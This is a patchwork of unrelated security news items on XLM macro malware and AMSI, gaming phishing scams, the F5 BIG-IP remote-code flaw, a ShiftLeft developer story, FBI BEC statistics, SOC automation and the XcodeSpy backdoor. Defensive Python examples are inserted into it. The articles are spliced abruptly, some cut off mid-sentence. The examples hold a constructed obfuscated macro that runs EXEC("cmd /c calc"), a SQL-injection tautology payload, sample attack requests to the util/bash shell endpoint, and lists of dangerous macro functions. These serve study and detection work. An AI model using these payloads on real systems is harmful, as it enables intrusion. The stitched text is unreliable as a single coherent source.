Macros have been a simple, effective means of spreading malware since the 1990s, and some attackers still rely on them heavily to ensnare and infect unsuspecting users.
It’s a long standing issue that many companies have attempted to address over the years. Now, it seems that it’s Microsoft’s turn at bat again.
Recently, the Redmond Giant announced a new integration between its AMSI (Antimalware Scan Interface) and Office 365, aimed squarely at delivering a knockout blow to macro-based malware.
Earlier attempts to put a stop to macro abuse focused on VBA (Visual Basic for Applications), the macro language behind most Office malware: Microsoft hooked AMSI into the VBA runtime in 2018 so that antimalware engines could inspect a macro's behaviour as it ran.
That was effective as far as it went, but it had the side effect of pushing attackers away from VBA and toward XLM. XLM, also known as Excel 4.0 macros, is an older macro language that first shipped with Microsoft Excel in 1992 and is still supported today. The new integration has AMSI scan Excel 4.0 XLM macros at runtime, after the macro has resolved whatever obfuscation it carries, which should (emphasis on should) make them far harder to abuse.
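To make the difference between a content scan and a runtime scan concrete, here is an added example of my own; it is not Microsoft's AMSI code and not part of the original article. It emulates a constructed four-cell XLM macro with a toy evaluator (the sample cells, the evaluator's supported subset and the list of flagged functions are all assumptions made for the illustration) and shows that the dangerous call only becomes visible once the macro has assembled it:

```python
import re

# Constructed sample: the cells of a hidden Excel 4.0 macro sheet, as a defender might dump them.
# The macro spells EXEC out of CHAR() codes and writes the final formula into B1 at runtime,
# so no cell in the file ever contains the literal text EXEC("cmd ...").
SAMPLE_SHEET = {
    "A1": '=CHAR(69)&CHAR(88)&CHAR(69)&CHAR(67)',       # resolves to "EXEC"
    "A2": '=FORMULA(A1&"(""cmd /c calc"")",B1)',          # writes =EXEC("cmd /c calc") into B1
    "A3": '=GOTO(B1)',                                   # jumps to the freshly written cell
    "A4": '=HALT()',
}

# XLM functions that reach the operating system (assumed indicator list): EXEC runs a
# command line, CALL/REGISTER call DLL exports (Win32 APIs), FOPEN/FWRITE touch files.
SUSPICIOUS_FUNCS = ("EXEC", "CALL", "REGISTER", "RUN", "FOPEN", "FWRITE")


def split_top_level(text, sep):
    """Split on `sep` only when outside double quotes and parentheses."""
    parts, cur, depth, in_str = [], "", 0, False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append(cur)
                cur = ""
                continue
        cur += ch
    parts.append(cur)
    return parts


def evaluate(expr, cells):
    """Toy evaluator for the subset droppers use to assemble strings: "literals"
    (with "" as an escaped quote), CHAR(n), cell references and & concatenation.
    Anything else (EXEC(...), GOTO(...)) comes back as text, which is what we scan."""
    expr = expr.strip().lstrip("=")
    parts = split_top_level(expr, "&")
    if len(parts) > 1:
        return "".join(evaluate(p, cells) for p in parts)
    if len(expr) >= 2 and expr[0] == '"' and expr[-1] == '"':
        return expr[1:-1].replace('""', '"')
    m = re.fullmatch(r"CHAR\((\d+)\)", expr, re.IGNORECASE)
    if m:
        return chr(int(m.group(1)))
    if re.fullmatch(r"[A-Z]+\d+", expr, re.IGNORECASE) and expr.upper() in cells:
        return evaluate(cells[expr.upper()], cells)
    return expr


def scan(text):
    """Dangerous XLM functions that `text` literally calls."""
    return sorted(f for f in SUSPICIOUS_FUNCS
                  if re.search(r"\b" + f + r"\s*\(", text, re.IGNORECASE))


def static_scan(cells):
    """What a content-only scanner sees: the formulas exactly as stored in the file."""
    return {ref: scan(formula) for ref, formula in cells.items() if scan(formula)}


def runtime_scan(cells):
    """What an AMSI-style hook sees: the macro after FORMULA() has written its
    deobfuscated payload into a cell and the concatenations have been resolved."""
    cells = dict(cells)
    # Emulate the sheet top to bottom. Only FORMULA(text, target) has a side effect
    # in this toy; GOTO/HALT control flow is ignored.
    for ref in sorted(cells):
        m = re.fullmatch(r"FORMULA\((.*)\)", cells[ref].lstrip("="), re.IGNORECASE | re.DOTALL)
        if m:
            arg_text, target = split_top_level(m.group(1), ",")
            cells[target.strip().upper()] = "=" + evaluate(arg_text, cells)
    return {ref: found for ref, formula in cells.items()
            if (found := scan(evaluate(formula, cells)))}


if __name__ == "__main__":
    print("static :", static_scan(SAMPLE_SHEET))   # {}  nothing literal to match
    print("runtime:", runtime_scan(SAMPLE_SHEET))  # {'B1': ['EXEC']}
```

Run it and the static pass reports nothing, because the string EXEC never appears in the file; the runtime pass reports B1, the cell the macro wrote while executing. That is the vantage point AMSI gains by hooking the XLM runtime rather than the file on disk. The flip side is that the macro has to start running before the scan fires, so the hook has to block before the flagged call executes.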
As a representative from Microsoft Security Teams explains:
“While more rudimentary than VBA, XLM is powerful enough to provide interoperability with the operating system, and many organizations and users continue to use its functionality for legitimate purposes. Cyber criminals know this, and they have been abusing XLM macros, increasingly more frequently, to call Win32 APIs and run shell commands.
Naturally, threat actors like those behind Trickbot, Zloader, and Ursnif have looked elsewhere for features to abuse and operate under the radar of security solutions, and they found a suitable alternative in XLM.”
Time will tell how effective this new approach will be. Unfortunately, even if it is wildly successful, it will simply push hackers toward some other easy exploit. Even so, kudos to Microsoft for taking the fight to the hackers.
There’s been a number of scams targeting fans of major upcoming video game releases over the last week or two. Why is this happening, and what can you do to ensure both you and your children avoid such fakeouts?
When net-connected consoles blasted their way into homes from around the time of the original Xbox onward, this granted a second life to the old cover tapes and discs. Consoles came with demos pre-loaded, you could download demos or full games, and update purchased titles on the fly.
Consoles going digital slowly came with its own problems. Even so, the digital download revolution encouraged new funding models and ways to play games. Early access, where players are granted first look at a title by paying or for free, is where our latest scam lies.
What are the scammers doing?
Scammers are using demos and early access promises as bait for phishing and other forms of attack. The upcoming Resident Evil title, Village, currently has a spin-off demo called “Maiden” on the PlayStation 5, with other versions to follow. Enterprising phishers are distributing fake mails offering “Early access invitations” to play Village itself, the full game, which is set after the events of Maiden.
In this way, they’re trying to ride the wave of popularity for Maiden by encouraging people to get their hands on the rest of the content. The game developers, Capcom, also mention avoiding any files offered up by the phish. This sounds very much like the phishers were also dabbling in malware distribution.
We bring tidings. Bad tidings.
The full Capcom message sent to press reads as follows:
We’re sending this message as we’ve been made aware that there are currently emails circulating that pretend to contain “Early Access invitations” to Resident Evil Village. The sender address is being displayed as “no-reply(at)capcom(dot)com”.
We want to inform you that these messages are NOT from Capcom and appear to be phishing attempts by an unauthorized third party. If you have received such a message, please DO NOT download any files or reply, and delete the message immediately.
If you are unsure of the authenticity of correspondence from Capcom, please contact us directly to verify.
This is perfect bait for younger gamers who may not be aware of this type of scam attempt. No doubt it’ll have caught out many an adult gamer, too. That’s the most recent attempt at tricking people with fake early access. Shall we take a look at a slightly earlier effort?
Fake Beta build scammers come for Far Cry
Far Cry 6 is the soon to be released entry in Ubisoft’s unstoppable game series. Last month, a supposed “beta” build of the game was mentioned in emails to various influencers and content creators in the gaming space. The mail, flagged as being under embargo, comes complete with an access password. When the password is entered (it isn’t clear whether that means opening a zip or typing it into a fake website), an infection is downloaded to the PC. According to potential victims, it “watches your screen and records everything you do”.
That’s bad enough. This is by no means the end of the wave of fake beta/early access/demo invites though.
Gaming a wide audience
In January, THQ Nordic warned of scam mails related to their game Biomutant. As with the other missives, it seems to focus on content creators / developers. Seeing developers state that no early builds of games are being mailed to people is bad news. Could one group specifically be trying this early access build gimmick? Or is everyone at it? Quite often, a new way to go on the offensive is posted to underground forums and then people go off and try it. That could be what is happening with these attacks, or it could just be coincidence.
At least some of these attacks target gaming influencers or people with large platforms, so you may never encounter them. If you do fall into that category, basic security hygiene applies: check the security of all your accounts and enable two-factor authentication wherever it is available, run up-to-date security software, and make sure all your devices are patched.
Begin locking down your gaming accounts if you haven’t already. It might not just be your PC at risk from attacks. They could be after your console logins / details too. All major gaming consoles have plenty of security features. It’s well worth digging out their security documentation and shoring up any gaps in your defence.
If a games developer emails you out of the blue, it’s fairly easy to figure out what’s real and what isn’t. Major titles announce betas, and early access programs clearly on websites, social media, and gaming portals. It isn’t left to random mail shots and mysterious attachments. If there’s no evidence of whatever you’ve been sent in some sort of official capacity, steer clear. Worst case scenario, you can always contact most developers on social media. They will likely be happy to help if what you’re showing them is a scam.
Press X to continue?
We recommend telling younger gamers in your household about these scams, and also the security solutions used to address them. The “exclusive preview build” technique aimed at influencers probably won’t remain aimed at them exclusively for very long, so watch out for that. You may as well get ahead of the game now before the inevitable next wave of beta invite scams land in mailboxes near you. There’s always something to think about in video game land.
Almost 10 days after application security company F5 Networks released patches for critical vulnerabilities in its BIG-IP and BIG-IQ products, adversaries have begun opportunistically mass scanning and targeting exposed and unpatched networking devices to break into enterprise networks.
News of in-the-wild exploitation comes on the heels of proof-of-concept exploit code that surfaced online earlier this week, produced by reverse-engineering the Java software patch in BIG-IP. The mass scans are said to have spiked since March 18.
The flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical remote code execution (CVE-2021-22986) also impacting BIG-IQ versions 6.x and 7.x. CVE-2021-22986 (CVSS score: 9.8) is notable for the fact that it’s an unauthenticated, remote command execution vulnerability affecting the iControl REST interface, allowing an attacker to execute arbitrary system commands, create or delete files, and disable services without the need for any authentication.
Successful exploitation of these vulnerabilities could lead to full compromise of vulnerable systems, including remote code execution; one of the flaws is a buffer overflow that can also be triggered to cause a denial of service (DoS).
While F5 said on March 10 that it was not aware of any public exploitation of these issues, researchers from NCC Group say they have since found evidence of “full chain exploitation of F5 BIG-IP/BIG-IQ iControl REST API vulnerabilities CVE-2021-22986” after multiple exploitation attempts against their honeypot infrastructure.
Additionally, Palo Alto Networks’ Unit 42 threat intelligence team said it found attempts to exploit CVE-2021-22986 to install a variant of the Mirai botnet. But it’s not immediately clear if those attacks were successful.
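One check a defender can run while the scanning is under way is to look at who is reaching the iControl REST API at all. The following is an added example, not from the article and not F5 tooling: it parses constructed access-log lines (the log format, the management CIDRs and the client addresses are assumptions for the illustration) and flags every request under /mgmt/ that did not come from a management network, rating a successful call to the shell-executing util/bash endpoint as critical:

```python
import ipaddress
import re
from collections import Counter

# Networks that are allowed to reach the management plane (assumed for this example).
MGMT_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.50.0/24")]

# Constructed access-log lines in a simplified combined format; they are not real F5 logs.
# /mgmt/ is the path prefix of the iControl REST API; /mgmt/tm/util/bash is its endpoint
# for running shell commands, so a 200 for it from outside is the worst case.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Mar/2021:10:01:12 +0000] "POST /mgmt/shared/authn/login HTTP/1.1" 401 0
203.0.113.7 - - [18/Mar/2021:10:01:13 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 512
198.51.100.9 - - [18/Mar/2021:10:02:40 +0000] "GET /mgmt/tm/sys/version HTTP/1.1" 401 0
192.168.50.20 - admin [18/Mar/2021:10:03:01 +0000] "GET /mgmt/tm/sys/version HTTP/1.1" 200 2048
203.0.113.7 - - [18/Mar/2021:10:03:30 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+$'
)


def is_management(ip):
    """True when `ip` falls inside one of the allowed management networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MGMT_NETS)


def audit_icontrol_access(log_text):
    """Return (severity, ip, method, path, status) for every iControl REST request
    that did not come from a management network."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["path"].startswith("/mgmt/") or is_management(m["ip"]):
            continue
        shell_ok = m["path"].startswith("/mgmt/tm/util/bash") and m["status"] == "200"
        severity = "critical" if shell_ok else "exposure"
        findings.append((severity, m["ip"], m["method"], m["path"], int(m["status"])))
    return findings


def top_sources(findings, n=5):
    """Sources hitting the API most often; a quick way to spot a mass scan."""
    return Counter(f[1] for f in findings).most_common(n)


if __name__ == "__main__":
    hits = audit_icontrol_access(SAMPLE_LOG)
    for h in hits:
        print(*h)
    print(top_sources(hits))
```

The one grounded assumption is that the iControl REST interface lives under /mgmt/ and should never be reachable from untrusted networks, which is also F5's standing mitigation advice. Anything this script flags on an internet-facing address means the device is exposed regardless of patch level, and a 200 for util/bash from outside calls for incident response rather than a patch ticket.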
Given the popularity of BIG-IP/BIG-IQ in corporate and government networks, it should come as no surprise that this is the second time in a year F5 appliances have become a lucrative target for exploitation.
Last July, the company addressed a similar critical flaw (CVE-2020-5902), following which it was abused by Iranian and Chinese state-sponsored hacking groups, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a “broad scanning activity for the presence of this vulnerability across federal departments and agencies.”
“The bottom line is that [the flaws] affect all BIG-IP and BIG-IQ customers and instances — we urge all customers to update their BIG-IP and BIG-IQ deployments to the fixed versions as soon as possible,” F5 Senior Vice President Kara Sprague noted last week.
Ryuk is one of the deadliest ransomware out there, and now has worm capabilities to infect networks. Here’s a detailed analysis of the new variant.
Hello and welcome to Sec Soup, where the weekly newsletter has a collection of infosec links to Tools & Tips, Threat Research, and more! The focus trends toward DFIR and threat intelligence, but general information security and hacking-related topics are included as well. This list is not vetted nor intended to be an exhaustive source. Keeping up with the enormous volume of security-related information is a daunting task, but this is my way of filtering the most useful items and improving the signal to noise ratio. Happy Reading!
Application Security for builders and creators — part 2
Previously on Application Security for builders and creators: Alice and Bob wanted to build a vaccine passport app with Go micro-services and a React UI. Claire suggested that the team engineer security into their app with ShiftLeft.
Review with AppSec on Zoom
ShiftLeft findings Review on Zoom
“Claire, let’s jump right in to the topic for today,” said Bob as he hurriedly looked for the screen-sharing button to share the ShiftLeft dashboard UI with Alice and Claire on Zoom.
ShiftLeft NG SAST dashboard for passport app
“What do you mean my git branch has 20 SQL Injection and 6 XSS vulnerabilities?” queried Bob. Before Claire could unmute herself, Bob continued, “For Sensitive Data Leaks I’m logging the payload in dev which I can turn off when the app goes live. As you might know we are planning to use docker and host the micro-services on Google Kubernetes Engine (GKE). All our CDN endpoints are behind Cloudbare WAF. Should we still treat these SQLi findings as critical?”
Claire started with the usual icebreaker, “Can you hear me?”.
She added, “It’s a strong argument, Bob. Thank you for sharing the details of the application infrastructure for your app. But unfortunately, Docker and GKE, while being excellent virtualization and orchestration technologies, cannot protect an application against SQL injection or any other application-specific vulnerability”.
Showing empathy and emotional intelligence are quite key while discussing security topics with developers. Instead of blaming Bob or making fun of his work, Claire started the conversation by thanking Bob.
“Yeah, you are right, Claire!” declared Bob. “But surely that expensive WAF can stop the injection attacks, right?”
Claire continued, “Ideally yes! But recently, we had an issue with Tracey’s apps. They suddenly stopped working so as a workaround we run our Cloudbare WAF in monitor-only mode in production”.
“WHAT!!!” Alice and Bob screamed spontaneously.
“Why are you feeling shocked? It is quite common to run a WAF and other runtime security tools in monitor-only mode. The idea is that over time everyone would feel confident enough to let the security tool block malicious traffic and payloads automatically. But that may never happen soon enough, since the risk of losing legitimate traffic and business usually outweighs the risk of missing the occasional malicious request,” concluded Claire.
There was silence even though everyone was clearly unmuted. The team had learnt the hard reality of those cloud infrastructure security tools: they run in monitor-only mode and produce alerts that someone else has to review periodically. The person reviewing the alerts, usually from a SOC team, may not have the engineering or even the security experience needed to tell a malicious injection attempt from a genuine API request carrying a JSON or gRPC payload.
Threat modelling for busy developers
Bob is a polyglot developer who has recently been juggling Go and TypeScript. He is also involved in configuring Helm charts and ensuring that the Kubernetes namespaces on Google Cloud are set up for zero-downtime and canary deployments.
When a developer is this busy, expecting them to think about threat modelling and textbook frameworks such as STRIDE is ambitious. Offering security training to busy developers in the form of a learning academy is a good idea. Claire decided to help the team by authoring threat scenarios in Gherkin-style language that developers could readily understand. Some example scenarios:
As a user of passport api
  When I change the id in the request
  Then I should not be allowed to view other users' data

As a user of passport api
  When I change the folder name used for the bucket
  Then I should not be allowed to download other users' files

As a user of passport UI
  When I use a different email instead of mine
  Then I should not be allowed to reset the password for other users
By collaboratively authoring threat scenarios, busy developers like Bob understood the importance of building security into the code instead of relying entirely on external infrastructure such as Kubernetes or a WAF to secure their application. Scenarios combined with a diagram help them visualize the blast radius of a threat and understand the roles and responsibilities of developers, AppSec and SOC teams; security is a shared responsibility after all.
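The first scenario above is an authorization test, and it is worth seeing what the code it describes looks like. The following is an added example, not from the ShiftLeft article and not the fictional team's code: a constructed in-memory passport store, a stand-in authentication middleware (a demo header instead of a real token), and two handlers, one that only authenticates and one that also performs the object-level check the scenario demands. The store, the paths and the header name are assumptions for the illustration:

```python
from dataclasses import dataclass, field
from typing import Optional

# Constructed in-memory store standing in for the passport database.
PASSPORTS = {
    "u-100": {"name": "Alice", "status": "vaccinated"},
    "u-200": {"name": "Bob", "status": "pending"},
}


@dataclass
class Request:
    path: str
    headers: dict = field(default_factory=dict)
    user: Optional[str] = None   # set by the auth middleware, never by the client


def authenticate(handler):
    """Stand-in auth middleware: establishes WHO is calling (a demo header here; a real
    service would validate a signed token). It says nothing about WHAT the caller may
    read; that object-level decision belongs in the handler."""
    def wrapped(req):
        uid = req.headers.get("X-Demo-User")
        if not uid:
            return 401, {"error": "unauthenticated"}
        req.user = uid
        return handler(req)
    return wrapped


def passport_id(req):
    """The id the client put in the URL, e.g. /passport/u-100 -> u-100."""
    return req.path[len("/passport/"):] if req.path.startswith("/passport/") else ""


@authenticate
def vulnerable_handler(req):
    """Authenticated, but trusts the id in the URL: any user can read any record."""
    rec = PASSPORTS.get(passport_id(req))
    return (200, rec) if rec else (404, {"error": "not found"})


@authenticate
def fixed_handler(req):
    """Object-level authorization: the caller may only read their own record. The check
    compares against the identity the middleware established, before any lookup."""
    pid = passport_id(req)
    if pid != req.user:
        return 403, {"error": "forbidden"}
    rec = PASSPORTS.get(pid)
    return (200, rec) if rec else (404, {"error": "not found"})


def run_scenario(handler, as_user, path):
    """'When I change the id in the request': call as `as_user` and ask for `path`.
    Returns the HTTP status the scenario would observe."""
    headers = {"X-Demo-User": as_user} if as_user else {}
    status, _body = handler(Request(path=path, headers=headers))
    return status


if __name__ == "__main__":
    # Bob asks for Alice's passport: the vulnerable handler answers 200, the fixed one 403.
    print(run_scenario(vulnerable_handler, "u-200", "/passport/u-100"))
    print(run_scenario(fixed_handler, "u-200", "/passport/u-100"))
```

run_scenario is the scenario written as a function call: Bob (u-200) asks for Alice's record (u-100). Returning 404 instead of 403 is a defensible variant if you do not want to confirm that the other id exists; the important part is that the check runs before the lookup and compares against the identity the middleware established, never against anything the client sent. The bucket scenario is the same check with the folder name in place of the id.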
Bob agreed to review the findings on ShiftLeft and incorporate additional checks based on the threat scenarios. Claire meanwhile, configured ShiftLeft analysis to lower the severity of Sensitive Data Leaks category to Info by using modify-findings CLI command as explained here.
Developer experience with ShiftLeft
As Bob started playing with ShiftLeft, he realized that ShiftLeft NG SAST is not a bad tool after all. As he navigated to the SQL Injection category, he saw that ShiftLeft was presenting the entire vulnerable data flow as evidence.
ShiftLeft NG SAST dev experience
The sources of the SQL injection findings were either the HTTP middleware or the user’s cookie. The sink was the database library code that issues the query, and the same applies to NoSQL stores (NoSQL injection) as to relational ones. Bob had not thought about validating or sanitizing user input while working under pressure.
By presenting the file and method information, ShiftLeft helped Bob resolve all the SQL injection findings the same day.
Shifting-Left improves dev productivity
By pointing out application vulnerabilities in a specific branch, ShiftLeft NG SAST helped Bob not only to address the current set of findings but also gave him an idea to build new endpoints that will not generate any SQL Injection vulnerabilities in the future. After all, once a common validation or sanitization method is developed every endpoint that gets the user input could reuse the same methods or even the middleware. Bob even published his validation methods as a common library to help other teams in their organization. Well done!
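The source-to-sink flow described above, and the shared validation helper Bob ended up writing, can be shown in a few lines. This is an added example of my own (not ShiftLeft's output and not the article's code) using an in-memory SQLite table as a constructed stand-in for the passport database; the table, the id format and the helper names are assumptions:

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the passport service's store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE passports (user_id TEXT PRIMARY KEY, name TEXT, status TEXT)")
    conn.executemany("INSERT INTO passports VALUES (?, ?, ?)",
                     [("u-100", "Alice", "vaccinated"), ("u-200", "Bob", "pending")])
    return conn


def lookup_vulnerable(conn, session_user):
    """Source: the user id read from the session cookie. Sink: SQL built by string
    formatting, so the cookie value becomes part of the query text."""
    sql = f"SELECT name, status FROM passports WHERE user_id = '{session_user}'"
    return conn.execute(sql).fetchall()


USER_ID_RE = re.compile(r"u-\d{1,12}")


def is_valid_user_id(value):
    """Allow-list check: ids look like u-<digits> and nothing else."""
    return bool(USER_ID_RE.fullmatch(value))


def validate_user_id(value):
    """The shared helper middleware can apply to every endpoint before a handler
    ever sees the value."""
    if not is_valid_user_id(value):
        raise ValueError(f"invalid user id: {value!r}")
    return value


def lookup_fixed(conn, session_user):
    """Validation plus a parameterized query: the driver passes the value separately
    from the SQL text, so it can never change the query's structure."""
    uid = validate_user_id(session_user)
    return conn.execute("SELECT name, status FROM passports WHERE user_id = ?", (uid,)).fetchall()


def lookup_parameterized_only(conn, session_user):
    """Parameterization without validation, to show it defeats the tautology on its own."""
    return conn.execute("SELECT name, status FROM passports WHERE user_id = ?",
                        (session_user,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"                    # classic tautology injected via the cookie
    print(lookup_vulnerable(db, payload))        # both rows leak
    print(lookup_parameterized_only(db, payload))  # [] : the value is just a string
    try:
        lookup_fixed(db, payload)
    except ValueError as e:
        print("rejected:", e)
```

The injected tautology returns both rows from the string-built query. The fixed lookup refuses it twice over: the allow-list validator rejects anything that is not of the form u-<digits>, and the parameterized query treats the value as data even when validation is skipped. Put the validator in middleware and every endpoint that takes a user id inherits it, which is the reuse the paragraph describes.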
After remediating the SQL Injection vulnerabilities, Bob and Alice turned their attention to Cross-Site scripting (XSS). Using the React framework for the UI was after all Alice’s idea; the documentation page on React claims that the framework automatically sanitizes user input reducing the opportunities for XSS. Yet, here ShiftLeft is claiming that there are 6 XSS vulnerabilities in the app. How is this possible? Whom do you trust — ShiftLeft the Application Security expert or React documentation from Facebook?
The team decides to have another call with Claire, their DevSecOps person, to discuss XSS vulnerabilities.
Descartes on AI: I Think, Therefore I Am… Not a Machine. Keith Gunderson, a pioneering philosopher of robotics, in his 1964 paper “Descartes, La Mettrie, Language and Machines” captured this Robert Stoothoff translation of the 1637 Discourse: If there were machines which bore a resemblance to our bodies and imitated our actions as closely as possible for all practical purposes, we should still have two …
SolarWinds is a Dust Bowl Disaster of Modern Computing. What was the Dust Bowl Disaster? The term Dust Bowl was coined in 1935 when an AP reporter, Robert Geiger, used it to describe the drought-affected south central United States in the aftermath of horrific dust storms. Although it technically refers to the western third of Kansas, southeastern Colorado, the Oklahoma Panhandle, the northern two-thirds …
Internet crime is ever present, and with the ongoing pandemic, levels of scams and fraud were exceptionally high in 2020. Opportunistic fraudsters didn’t give a second thought to riding the COVID-19 wave and preying upon those who are truly in need of help, or those who truly want to help.
The Internet Crime Complaint Center (IC3), an arm of the FBI where internet users can report online fraud crimes, recently released the 2020 Internet Crime Report, an annual report that contains high-level information on suspected fraud cases reported to them and their losses. A state-by-state statistical breakdown of these cases were included in an accompanying report, 2020 State Reports, that you can browse through here.
The IC3 has found that the three biggest complaints they received in 2020 are phishing scams, which garnered the highest number of complaints (241,342), ransomware (2,474), and, perhaps the most striking of these, Business Email Compromise (BEC) (19,369). It’s striking, not because of the number of complaints but because BEC scams recorded the highest total losses by victims, at roughly $1.8 billion USD. Although phishing led to the highest number of complaints, victims “only” lost $54 million USD, a fraction of the money lost to BEC scams.
According to IC3, BEC can also be called Email Account Compromise (EAC). It may or may not involve a layered attack, depending on how a threat actor can better mimic the person they’re spoofing, and how much their target employee would be able to buy into the overall deception.
It starts off with an email, either from a compromised account or spoofed address, to make it look like it originated from a particular sender. The threat actor, usually posing as a higher-up within a company, contacts a more junior employee in the company who is cleared to perform funds transfers. The attacker gives the junior employee a plausible but urgent instruction to make a large, confidential transfer of money to a fake supplier.
“In 2020, the IC3 observed an increase in the number of BEC/EAC complaints related to the use of identity theft and funds being converted to cryptocurrency,” according to the report. “In these variations, we saw an initial victim being scammed in non-BEC/EAC situations to include Extortion, Tech Support, Romance scams, etc., that involved a victim providing a form of ID to a bad actor. That identifying information was then used to establish a bank account to receive stolen BEC/EAC funds and then transferred to a cryptocurrency account.”
We remind businesses, regardless of sector, to be aware of BEC attack trends and be very vigilant in combatting it. BEC scams rely, in part, on the pressure that junior employees feel when asked to comply with demands from senior employees, and told not to alert anyone else. Employees should be empowered to seek advice and take the time they need.
Also, if your company doesn’t have an extra layer or two of authentication before the request to transfer money is green-lit, put one in place now. A phone or video call is ideal.
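Much of the spoofing described above is visible in the headers before anyone reads the body. The following is an added example, not from the IC3 report or the article: it inspects two constructed messages (the people, domains and Authentication-Results values are invented for the illustration) and lists the indicators a mail gateway or a cautious recipient can check, namely no passing SPF or DKIM result for the From domain, a DMARC failure, a Reply-To or Return-Path on a different domain, and pressure language in the text. The same header checks apply to the spoofed no-reply@capcom.com mails in the gaming story earlier on this page:

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed message: the From header claims the CFO's domain, the envelope sender and the
# receiving server's Authentication-Results say otherwise, and Reply-To steers answers to a
# look-alike domain (examp1e.com, with a digit one).
SPOOFED_MSG = """\
Return-Path: <bounce@mail-relay.invalid>
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=mail-relay.invalid; dkim=none; dmarc=fail header.from=example.com
From: "Dana Cole, CFO" <dana.cole@example.com>
Reply-To: dana.cole@examp1e.com
To: junior.clerk@example.com
Subject: Urgent wire - confidential

Please process a wire of $48,500 to the new supplier today. Do not loop anyone else in.
"""

# Constructed legitimate message from the same sender for comparison.
CLEAN_MSG = """\
Return-Path: <dana.cole@example.com>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com
From: "Dana Cole, CFO" <dana.cole@example.com>
To: junior.clerk@example.com
Subject: Q2 budget review

Attached are the slides for Thursday.
"""

# Words that, together, signal the urgency/secrecy/payment pattern (assumed list).
PRESSURE = ("urgent", "today", "confidential", "do not", "wire")


def domain_of(addr):
    """Domain part of an address header such as '"Name" <user@host>'."""
    return parseaddr(addr)[1].rsplit("@", 1)[-1].lower()


def auth_results(msg):
    """Parse the method=result pairs out of Authentication-Results (RFC 8601)."""
    out = {}
    for part in (msg.get("Authentication-Results") or "").split(";")[1:]:
        tokens = part.split()
        if tokens and "=" in tokens[0]:
            method, result = tokens[0].split("=", 1)
            out[method.lower()] = result.lower()
    return out


def bec_indicators(raw):
    """Return the list of header and content indicators found in the raw message."""
    msg = message_from_string(raw)
    from_dom = domain_of(msg["From"])
    res = auth_results(msg)
    flags = []
    if res.get("spf") != "pass" and res.get("dkim") != "pass":
        flags.append("no passing SPF or DKIM for the From domain")
    if res.get("dmarc") == "fail":
        flags.append("DMARC fail")
    if msg["Reply-To"] and domain_of(msg["Reply-To"]) != from_dom:
        flags.append(f"Reply-To domain {domain_of(msg['Reply-To'])} differs from From domain {from_dom}")
    if msg["Return-Path"] and domain_of(msg["Return-Path"]) != from_dom:
        flags.append("Return-Path domain differs from From domain")
    text = ((msg["Subject"] or "") + " " + msg.get_payload()).lower()
    if sum(word in text for word in PRESSURE) >= 3:
        flags.append("pressure language (urgency, secrecy, payment)")
    return flags


if __name__ == "__main__":
    print("spoofed:", bec_indicators(SPOOFED_MSG))
    print("clean  :", bec_indicators(CLEAN_MSG))
```

Header checks are not a substitute for the phone call: a message sent from a compromised mailbox passes SPF and DKIM cleanly, and only the Reply-To and the language give it away. Treat the script as a triage aid that tells the junior employee which messages to escalate, not as a decision.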
True, these steps introduce a bit of friction into your company’s processes, but a little inconvenience and delay could save your company millions of dollars.
Good luck!
The simplistic question of “Will machines replace humans in a SOC” can be clearly answered with a NO, as I explained in my previous post. As the human attackers are required to evolve the attacking robots, blue team people are required to update the automated defenses.
But things change if the question is asked with some additional nuance. If you ask “will defense actions be automated end to end, from detection to response actions?”, it becomes a more interesting question to answer.
The scenario of automated threats that Anton described in his post will, IMO, require SOCs to put together some end to end automation. Having a human involved for every response will not scale to face those attacks. Humans will be responsible for creating those playbooks and monitor their performance, but they cannot be involved in their execution. We need SOC automation that allows us to detect, investigate and initiate response without human intervention. This is challenging, but we must get there at some point.
Andre Gironda commented on the LinkedIn post pointing to my blog post that even with the appropriate tools he still can’t fully automate simple phishing response. I could say he’s probably being too perfectionist or doing something wrong, but I actually believe him. I believe automation can provide value by reducing human effort in the SOC right now, but full automation, even for some specific threats, is still challenging. But we’ll have to get there if we want to stand a chance.
A large part of today’s corporate network consists of mobile endpoints such as laptops, tablets and mobile phones. These are associated, non-domain-joined devices that need access to corporate assets to carry out day-to-day operations, a common scenario …
XcodeSpy is latest example of growing attacks on software supply chain.
Researchers from SentinelOne have discovered new malware targeting developers of macOS apps in the latest sign of growing attacker interest in the software supply chain.
The malware, XcodeSpy, is disguised as a legitimate Xcode open source project called TabBarInteraction that provides macOS developers with code for animating the iOS Tab Bar based on user interaction.
“Xcode is an Integrated Development Environment [IDE] provided by Apple for developers to create software applications for all of Apple’s platforms,” says Philip Stokes, threat researcher at SentinelOne.
It is free to download and use and is chiefly used by developers to create apps for iPhone, iPad, and Mac, he says.
XcodeSpy installs a variant of the EggShell backdoor on an Apple developer’s macOS system. The backdoor is designed to spy on the developer and has features for recording the victim’s camera, microphone, and keyboard activity. It also has the ability to download and upload files and to remain persistent on an infected system.
The malware is executed when a developer using the Trojanized version of the TabBarInteraction Xcode project launches what is known as the build target in Xcode. The XcodeSpy malware contacts the attacker’s command-and-control (C2) server and drops the EggShell backdoor on the development machine, SentinelOne said in a report this week.
“An Xcode project is a repository for all the files, resources, and information required to build one or more software products,” Stokes says. “A project contains all the elements used to build a product and maintain the relationships between those elements.”
